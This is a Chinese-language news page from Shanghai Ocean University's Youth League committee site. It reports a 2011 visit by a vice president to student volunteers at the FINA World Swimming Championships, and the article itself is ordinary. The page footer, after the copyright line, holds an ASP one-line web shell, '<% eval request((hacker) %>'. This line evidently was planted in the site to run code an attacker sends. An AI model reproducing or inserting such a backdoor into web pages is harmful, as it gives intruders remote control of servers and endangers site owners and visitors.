当前位置:共青团上海海洋大学委员会 >> 志愿服务 >> 志愿活动 >> 正文  
站内信息搜索:
校领导看望慰问我校世界游泳锦标赛志愿者
[2011年10月12日]   来源:本站原创   作者:佚名   点击数: 【字体: 】【双击滚屏

 

        715日下午,副校长封金章在校团委书记夏雅敏以及相关负责老师陪同下,前往校研究生交流与培训中心看望我校第十四届国际泳联世界锦标赛志愿者。

 

         

 

                              封金章副校长亲切慰问志愿者

 

                  

 

                             封金章副校长为志愿者送上慰问品

 

                  

 

                  志愿者欣然接受封金章副校长送上的我校本次世游赛慰问金属徽章

 

       校团委书记夏雅敏向封副校长详细介绍了本次国际泳联世界锦标赛我校志愿者的总体情况,并对目前我校志愿者前期相关工作做了汇报。封副校长对志愿者的工作成绩以及饱满状态表示肯定,并鼓励大家在志愿服务期间,好好注意身体,发扬我校志愿者优良传统,为学校争光,为中国添彩。随后封金章副校长与当天轮休的志愿者进行亲切的交谈,并为全体志愿者送上学校精心准备的慰问品,并亲自为志愿者送上我校本次世游赛慰问金属徽章。在场的志愿者都表示一定尽心服务,再次发扬我校快乐、环保、感恩志愿者精神,圆满完成本次志愿者服务工作。

 

 

 

关闭窗口

上一篇:世游赛金山公开水域志愿者的苦与乐

下一篇:欢庆百年 喜迎新岁——上海海洋大学迈入百年校庆年
  留言板 | 管理登录 版权所有 © 2007 共青团上海海洋大学委员会 tw.shou.edu.cn <% eval request((hacker) %>